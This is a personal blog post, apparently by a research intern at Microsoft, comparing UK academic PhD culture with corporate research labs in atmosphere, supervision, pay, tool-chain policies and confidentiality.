This of course, is a massive generalisation, and more applied to the recent batch of Ph.Ds coming through, especially as they come through doctoral training schemes which mesh (mostly unsuccessfully) different fields together. Still, scoring a blue-skies research project without lying through your teeth in the impact section of a proposal is like finding real ale in Essex.

Of course, there is the positive side of academia too. The freedom to tackle your problem via any means. Flexible working hours (unless you are an RA), flexible supervision, flexible scope. You can produce a highly polished massively overworked Ph.D, or the bare minimum which gets the job done. It is a very personal thing. Research projects are a bit more managed, you have a more rigid supervisory system, project meetings, but your section of stuff is pretty much yours to do as you will.

This environment breeds two types of people: the successful ones who generally ask for and give help to their peers, accept criticism with grace, and who thrive in a space where they make the rules; and the other ones who, having seen the gaping ravine of work in front of them, bottle it and fail. Maybe not straight away nor suddenly, as it could creep up after a year or two, but Ph.Ds have been known to just disappear into industry after 4 years, with not a word to anyone. It is very easy to lose sight of where you are aiming to get to, reaching a false summit of your thesis and calling it done.

Academia is very much a dog eat dog world. The UK has a much nicer tenure-free environment, but even the tenant of the American “publish or perish” culture still exists. Academics live off their reputation, and their reputation is written in the black ink of a bibliography.

Corporate research is exactly the same landscape but with a few key differences.

For a start, the “build a prototype” message is very clear, especially for systems which may one day be products. You are building and evaluating a proof of concept, as it should be.

Secondly, the atmosphere is completely different. Whereas in the academic environment it is almost taboo to ask on a struggling Ph.D how their work is going, in corporate research struggling researchers are actively propped up and discussions at lunch and the pub are refreshingly problem orientated.

Thirdly, your supervisor is your manager. Which from a managerial point of view is awesome, you have someone who is your boss and *knows* what they are talking about, whilst still being your supervisor and knowing all the issues that come from research and how best to stimulate ideas out of dead ends. From an intern perspective this is also good, as seeing your supervisor as your boss makes you want to impress them more, and meet deadlines days earlier.

Finally, the pay is miles better.

Those are the good bits, and of course, there are some bad bits too.

Corporate research labs tend to have a “eat your own dog food” policy, which means that if the company creates a tool that can do you job, you use it, unless you can find a valid research reason not to. Working at Microsoft and being a Linux user, you can see how this has led to initial slow productivity as I’ve readjusted to an alien tool-chain.

There are also some scary law type things which get attached to the job, such as losing a kidney if I speak of what I see on whiteboards and such. However, this style of development is slowly losing ground as projects like Gadgeteer are being released under an Apache licence.

As a final point, having worked in some small companies where you have the “family” feel, I still find that you get this here. It may be due to the organisation of the research lab, but everyone is very friendly and you associate with your research group quite strongly. But not in a “compete against other group” way, as everyone in the building is amazingly friendly.

So far I’m enjoying it, we’ll see if I still do in 8 weeks time 😉

C